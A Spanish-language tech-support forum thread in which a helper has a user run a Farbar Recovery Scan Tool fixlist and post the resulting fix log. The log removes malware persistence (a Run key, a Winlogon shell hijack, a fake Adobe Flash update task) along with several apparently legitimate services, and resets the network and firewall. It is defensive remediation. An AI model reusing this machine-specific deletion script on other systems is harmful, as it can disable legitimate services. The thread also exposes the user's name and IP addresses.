Guárdalo bajo el nombre de FIXLIST.TXT en el escritorio :arrow_backward: Esto es muy importante.

:o: Nota :o: Es importante que la herramienta FRST.exe(Farbar Recovery Scanner Tool) y FIXLIST.TXT se encuentren en la misma ubicación (escritorio) o si no, no trabajara.

Y ahora inicia tu equipo desde el :arrow_forward: Modo Seguro – con funciones de Red, de Windows

  • Ejecuta FRST.exe.(Si usas Windows Vista/7/8 o 10, presiona clic derecho y seleccionas -Ejecutar como Administrador-).

  • Presionar el botón FIX/Corregir y aguardar a que termine.

  • La Herramienta guardara el reporte de reparación en el escritorio (FIXLOG.TXT).

Pegar el contenido de este fichero en tu próxima respuesta. :+1:

Reiniciar el equipo y comprobar su funcionamiento en relación al problema planteado y comentarlo.

Saludos.

Hola!

El equipo continua funcionando bien hasta el momento como lo hacia normalmente antes del problema. A continuación te envío el reporte que me solicitaste.

Resultados de la corrección de Farbar Recovery Scan Tool (x64) Versión: 28-03-2020
Ejecutado por MARCO AVILA (28-03-2020 10:44:42) Run:1
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Perfiles cargados: MARCO AVILA (Perfiles disponibles: MARCO AVILA & Administrador)
Modo de Inicio: Safe Mode (with Networking)
==============================================

fixlist contenido:
*****************
START
CREATERESTOREPOINT:
CLOSEPROCESSES:
ContextMenuHandlers1: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} => -> Ning�n archivo
AlternateDataStreams: C:\ProgramData\Temp:0574215C [120]
AlternateDataStreams: C:\ProgramData\Temp:D95ACC7D [135]
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [rm] => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe [3244032 2020-03-26] (Ggmyhirjho) [Archivo no firmado] <==== ATENCI�N
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [24552064 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Winlogon: [Shell] explorer.exe, "C:\ProgramData\ErrorResponder\errorResponder.exe" <==== ATENCI�N
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] ->
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.149\Installer\chrmstp.exe [2020-03-19] (Google LLC -> Google LLC)
ShortcutTarget: Acer VCM.lnk -> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Ning�n archivo)
GroupPolicy: Restricci�n ? <==== ATENCI�N
Task: {044F4A48-321A-43AC-A9F6-F19F8D91B966} - System32\Tasks\Adobe Flash sdk Files Update up_2020326 => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe [3279360 2020-03-26] (Rfz) [Archivo no firmado] <==== ATENCI�N
Task: {12AFE1A3-4413-46CF-91D7-57ED665810D6} - System32\Tasks\{24DB5AEF-77D6-4D21-A60D-FC51D1DE0800} => F:\DERIVE\Setup.exe
Task: {1D6C3AD0-820D-4CF9-BF65-62DD5CC0D487} - System32\Tasks\{CE0061C3-BB4E-4F9D-AE54-4C440ACD7DCB} => F:\soft\Setup.exe
Task: {2039C8D7-5F63-4C20-979C-C67488199856} - System32\Tasks\{A75F7D66-592A-4D97-ABFC-86C0BECA5C74} => F:\soft\Setup.exe
Task: {28324B50-233C-4D3B-9B94-B5A7A3162929} - System32\Tasks\{DE9A6B33-FA22-416A-A54F-A84670A2D085} => F:\driver\setup.exe
Task: {2E8ED139-72E6-483B-B20C-453CEF07EAC4} - \cfozyfozh -> Ning�n archivo <==== ATENCI�N
Task: {4692B3B5-1754-4087-8BB4-F28C35B8DB70} - System32\Tasks\{4DE22ECF-13B1-486E-A4BF-8E1A61B22195} => F:\DERIVE\Setup.exe
Task: {4FE45DF9-137F-4313-ADC2-C643B9F07A48} - System32\Tasks\{63606048-94AF-4BF5-8844-18B2029713AE} => F:\driver\setup.exe
Task: {7E78E065-237E-4109-BA80-217925760F0B} - System32\Tasks\{362B582C-452B-4BCE-9FDA-E3F3F8988AD7} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{F3D5ECF7-7AE4-4B53-8A7E-1F850D6AE6B4}\setup.exe" -c -runfromtemp -l0x0009 -removeonly
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {8736786B-E568-46C9-8E25-B1FA90D746B9} - System32\Tasks\{2764DDF7-A8C2-4955-BB01-5162F65D6B11} => F:\DERIVE\Setup.exe
Task: {9082DDA6-859B-4932-93AC-BF5642AB6B3F} - System32\Tasks\{0394875D-2637-469D-9971-0B2FC6300FA0} => F:\DERIVE\Setup.exe
Task: {BD144ED7-700F-4835-9680-928B99A7387B} - System32\Tasks\{EB168395-2BF7-4FA0-A39B-4D3FC10D0E6E} => F:\driver\setup.exe
Task: {C680F459-75EB-4FB7-AA17-7797EB0915E4} - System32\Tasks\{F0737E83-4EB2-4475-B6D0-3055061A38A1} => F:\DERIVE\Setup.exe
Task: C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job => C:\Users\MARCOA~1\AppData\Local\Temp\~atmp\_9D4F.exe/check_update C:\Users\MARCO AVILA\AppData\Local\inetinfoserviceMARCO AVILA6This task detecct has update for sdk files.up <==== ATENCI�N
SearchScopes: HKLM -> DefaultScope no se encuentra el valor
BHO: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ning�n archivo
Handler: WSISAllmytubechrome - Sin valor CLSID
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MARCOA~1\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx <no encontrado>
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [fhjnbgadgmmffddcilnbmcieekimilcn] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
S2 Greg_Service; C:\Program Files (x86)\Acer\Registration\GregHSRW.exe [X]
S2 NTI IScheduleSvc; C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [X]
S3 NTIBackupSvc; C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe [X]
S2 NTISchedulerSvc; C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe [X]
S2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [X]
S2 Updater Service; C:\Program Files\Acer\Acer Updater\UpdaterService.exe [X]
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Windows -> Microsoft Corporation) <==== ATENCI�N (no ServiceDLL)
S3 cpuz137; \??\C:\Users\MARCOA~1\AppData\Local\Temp\cpuz137\cpuz137_x64.sys [X] <==== ATENCI�N
S3 hfFilter; system32\drivers\hfFilter.sys [X]
S3 JakNDisMP; system32\DRIVERS\JakNDis.sys [X]
S2 MBAMChameleon; \SystemRoot\System32\Drivers\MbamChameleon.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
2020-03-26 11:39 - 2020-03-26 11:46 - 000000000 ____D C:\ProgramData\SGZPftQsRObztM
2020-03-26 11:39 - 2020-03-26 11:45 - 000000000 ____D C:\ProgramData\pBjXawQUXRlgujtt
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\rkitjuoutqb
2020-03-27 19:23 - 2017-11-28 20:52 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\IObit
2020-03-27 19:23 - 2017-10-19 11:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-03-27 19:23 - 2015-06-23 19:22 - 000000000 ____D C:\Users\MARCO AVILA\AppData\LocalLow\IObit
2020-03-27 19:23 - 2015-06-23 19:20 - 000000000 ____D C:\ProgramData\IObit
HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END
*****************

Error: El punto de restauración solamente puede ser creado en modo normal.
Procesos cerrados correctamente.
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Cover Designer => eliminado correctamente
C:\ProgramData\Temp => ":0574215C" ADS eliminado correctamente
C:\ProgramData\Temp => ":D95ACC7D" ADS eliminado correctamente
"HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Windows\CurrentVersion\Run\\rm" => eliminado correctamente
"HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Smart Cleaning" => no encontrado
"HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" => eliminado correctamente
HKLM\Software\Microsoft\Active Setup\Installed Components\{2D46B6DC-2207-486B-B523-A557E6D54B47} => eliminado correctamente
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{2D46B6DC-2207-486B-B523-A557E6D54B47} => eliminado correctamente
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{73FA19D0-2D75-11D2-995D-00C04F98BBC9} => eliminado correctamente
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => eliminado correctamente
"C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe" => no encontrado
C:\Windows\system32\GroupPolicy\Machine => movido correctamente
C:\Windows\system32\GroupPolicy\GPT.ini => movido correctamente
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{044F4A48-321A-43AC-A9F6-F19F8D91B966}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{044F4A48-321A-43AC-A9F6-F19F8D91B966}" => eliminado correctamente
C:\Windows\System32\Tasks\Adobe Flash sdk Files Update up_2020326 => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash sdk Files Update up_2020326" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{12AFE1A3-4413-46CF-91D7-57ED665810D6}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12AFE1A3-4413-46CF-91D7-57ED665810D6}" => eliminado correctamente
C:\Windows\System32\Tasks\{24DB5AEF-77D6-4D21-A60D-FC51D1DE0800} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{24DB5AEF-77D6-4D21-A60D-FC51D1DE0800}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1D6C3AD0-820D-4CF9-BF65-62DD5CC0D487}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1D6C3AD0-820D-4CF9-BF65-62DD5CC0D487}" => eliminado correctamente
C:\Windows\System32\Tasks\{CE0061C3-BB4E-4F9D-AE54-4C440ACD7DCB} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{CE0061C3-BB4E-4F9D-AE54-4C440ACD7DCB}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2039C8D7-5F63-4C20-979C-C67488199856}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2039C8D7-5F63-4C20-979C-C67488199856}" => eliminado correctamente
C:\Windows\System32\Tasks\{A75F7D66-592A-4D97-ABFC-86C0BECA5C74} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A75F7D66-592A-4D97-ABFC-86C0BECA5C74}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{28324B50-233C-4D3B-9B94-B5A7A3162929}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28324B50-233C-4D3B-9B94-B5A7A3162929}" => eliminado correctamente
C:\Windows\System32\Tasks\{DE9A6B33-FA22-416A-A54F-A84670A2D085} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{DE9A6B33-FA22-416A-A54F-A84670A2D085}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{2E8ED139-72E6-483B-B20C-453CEF07EAC4}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2E8ED139-72E6-483B-B20C-453CEF07EAC4}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cfozyfozh" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4692B3B5-1754-4087-8BB4-F28C35B8DB70}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4692B3B5-1754-4087-8BB4-F28C35B8DB70}" => eliminado correctamente
C:\Windows\System32\Tasks\{4DE22ECF-13B1-486E-A4BF-8E1A61B22195} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{4DE22ECF-13B1-486E-A4BF-8E1A61B22195}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4FE45DF9-137F-4313-ADC2-C643B9F07A48}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4FE45DF9-137F-4313-ADC2-C643B9F07A48}" => eliminado correctamente
C:\Windows\System32\Tasks\{63606048-94AF-4BF5-8844-18B2029713AE} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{63606048-94AF-4BF5-8844-18B2029713AE}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7E78E065-237E-4109-BA80-217925760F0B}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E78E065-237E-4109-BA80-217925760F0B}" => eliminado correctamente
C:\Windows\System32\Tasks\{362B582C-452B-4BCE-9FDA-E3F3F8988AD7} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{362B582C-452B-4BCE-9FDA-E3F3F8988AD7}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96}" => eliminado correctamente
C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Application Experience\ProgramDataUpdater" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96}" => no encontrado
"C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater" => no encontrado
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Application Experience\ProgramDataUpdater" => no encontrado
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8736786B-E568-46C9-8E25-B1FA90D746B9}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8736786B-E568-46C9-8E25-B1FA90D746B9}" => eliminado correctamente
C:\Windows\System32\Tasks\{2764DDF7-A8C2-4955-BB01-5162F65D6B11} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2764DDF7-A8C2-4955-BB01-5162F65D6B11}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9082DDA6-859B-4932-93AC-BF5642AB6B3F}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9082DDA6-859B-4932-93AC-BF5642AB6B3F}" => eliminado correctamente
C:\Windows\System32\Tasks\{0394875D-2637-469D-9971-0B2FC6300FA0} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0394875D-2637-469D-9971-0B2FC6300FA0}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BD144ED7-700F-4835-9680-928B99A7387B}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BD144ED7-700F-4835-9680-928B99A7387B}" => eliminado correctamente
C:\Windows\System32\Tasks\{EB168395-2BF7-4FA0-A39B-4D3FC10D0E6E} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{EB168395-2BF7-4FA0-A39B-4D3FC10D0E6E}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C680F459-75EB-4FB7-AA17-7797EB0915E4}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C680F459-75EB-4FB7-AA17-7797EB0915E4}" => eliminado correctamente
C:\Windows\System32\Tasks\{F0737E83-4EB2-4475-B6D0-3055061A38A1} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F0737E83-4EB2-4475-B6D0-3055061A38A1}" => eliminado correctamente
C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job => movido correctamente
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => valor restaurado correctamente
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{13D67BB7-DB5F-48AA-884D-7A5D94168509} => eliminado correctamente
HKLM\Software\Classes\PROTOCOLS\Handler\WSISAllmytubechrome => eliminado correctamente
Handler: WSISAllmytubechrome - Sin valor CLSID => no pudo ser eliminado.: incorrect path. 
"HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN" => no encontrado
C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll => movido correctamente
HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\apdfllckaahabafndbhieahigkjlhalf => eliminado correctamente
HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo => eliminado correctamente
HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh => eliminado correctamente
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fhjnbgadgmmffddcilnbmcieekimilcn => eliminado correctamente
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\jfmjfhklogoienhpfnppmbcbjfjnkonk => eliminado correctamente
HKLM\System\CurrentControlSet\Services\Greg_Service => eliminado correctamente
Greg_Service => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\NTI IScheduleSvc => eliminado correctamente
NTI IScheduleSvc => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\NTIBackupSvc => eliminado correctamente
NTIBackupSvc => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\NTISchedulerSvc => eliminado correctamente
NTISchedulerSvc => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\RS_Service => eliminado correctamente
RS_Service => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\Updater Service => eliminado correctamente
Updater Service => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\AppMgmt => eliminado correctamente
AppMgmt => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\cpuz137 => eliminado correctamente
cpuz137 => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\hfFilter => eliminado correctamente
hfFilter => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\JakNDisMP => eliminado correctamente
JakNDisMP => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\MBAMChameleon => eliminado correctamente
MBAMChameleon => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\RtsUIR => eliminado correctamente
RtsUIR => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\USBCCID => eliminado correctamente
USBCCID => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\VMnetAdapter => eliminado correctamente
VMnetAdapter => servicio eliminado correctamente
C:\ProgramData\SGZPftQsRObztM => movido correctamente
C:\ProgramData\pBjXawQUXRlgujtt => movido correctamente
C:\ProgramData\rkitjuoutqb => movido correctamente
C:\Users\MARCO AVILA\AppData\Roaming\IObit => movido correctamente
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft => movido correctamente
C:\Users\MARCO AVILA\AppData\LocalLow\IObit => movido correctamente
C:\ProgramData\IObit => movido correctamente
C:\Windows\System32\Drivers\etc\hosts => movido correctamente
Hosts restaurado correctamente.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente


========= Final de RemoveProxy: =========


========= netsh winsock reset =========


El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= Final de CMD: =========


========= ipconfig /renew =========


Configuraci¢n IP de Windows

No se puede realizar ninguna operaci¢n en Conexi¢n de red inal mbrica 2 mientras los medios
est‚n desconectados.
No se puede realizar ninguna operaci¢n en Conexi¢n de  rea local mientras los medios
est‚n desconectados.

Adaptador de LAN inal mbrica Conexi¢n de red inal mbrica 2:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : 

Adaptador de LAN inal mbrica Conexi¢n de red inal mbrica:

   Sufijo DNS espec¡fico para la conexi¢n. . : 
   Direcci¢n IPv6 . . . . . . . . . . : 2806:265:407:b62:1139:e7fe:7736:a620
   Direcci¢n IPv6 temporal. . . . . . : 2806:265:407:b62:e99a:c858:2299:657b
   V¡nculo: direcci¢n IPv6 local. . . : fe80::1139:e7fe:7736:a620%22
   Direcci¢n IPv4. . . . . . . . . . . . . . : 192.168.0.3
   M scara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : fe80::da9c:67ff:fede:fdf7%22
                                       192.168.0.1

Adaptador de Ethernet Conexi¢n de  rea local:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : 

Adaptador de t£nel isatap.{86463265-C657-4234-94AF-E401DE4093E0}:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : 

========= Final de CMD: =========


========= ipconfig /flushdns =========


Configuraci¢n IP de Windows

Se vaci¢ correctamente la cach‚ de resoluci¢n de DNS.

========= Final de CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to connect to BITS - 0x8007042c
No se puede iniciar el servicio o grupo de dependencia.



========= Final de CMD: =========


========= netsh advfirewall reset =========


Error al intentar ponerse en contacto con el servicio Firewall de Windows. Aseg£rese de que el servicio se est  ejecutando e intente la solicitud de nuevo.


========= Final de CMD: =========


========= netsh advfirewall set allprofiles state ON =========


Error al intentar ponerse en contacto con el servicio Firewall de Windows. Aseg£rese de que el servicio se est  ejecutando e intente la solicitud de nuevo.


========= Final de CMD: =========


========= netsh int ipv4 reset =========

Global se restableci¢ correctamente.
Interfaz se restableci¢ correctamente.
Direcci¢n de unidifusi¢n se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final de CMD: =========


========= netsh int ipv6 reset =========

Interfaz se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 1921478 B
Java, Flash, Steam htmlcache => 1275 B
Windows/system/drivers => 4129767 B
Edge => 0 B
Chrome => 321394520 B
Firefox => 367967118 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 33058 B
Public => 33058 B
ProgramData => 33058 B
systemprofile => 443929 B
systemprofile32 => 556875 B
LocalService => 689119 B
NetworkService => 821363 B
MARCO AVILA => 47666103 B
Administrador.MAAH-PC => 57955362 B

RecycleBin => 367520 B
EmptyTemp: => 774.8 MB datos temporales eliminados.

================================


El sistema necesita reiniciarse.

==== Final de Fixlog 10:48:39 ====

Saludos!

Perfecto @Marco :+1: excelente, nos alegra ver que ya está el problema inicial completamente arreglado, ahora solo queda eliminar las herramientas usadas.

Para hacerlo descarga :arrow_forward: DelFix.exe en tu escritorio.

  • Doble clic para ejecutarlo. (Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona - Ejecutar como Administrador -).

  • Marca todas las casillas, y pulsas en Run

Se abrirá el informe (DelFix.txt), puedes cerrarlo.


Para cualquier otro problema, no dudes en volver a postear., ya sabes dónde estamos. :+1:

Tema Solucionado.

Saludos, Javier.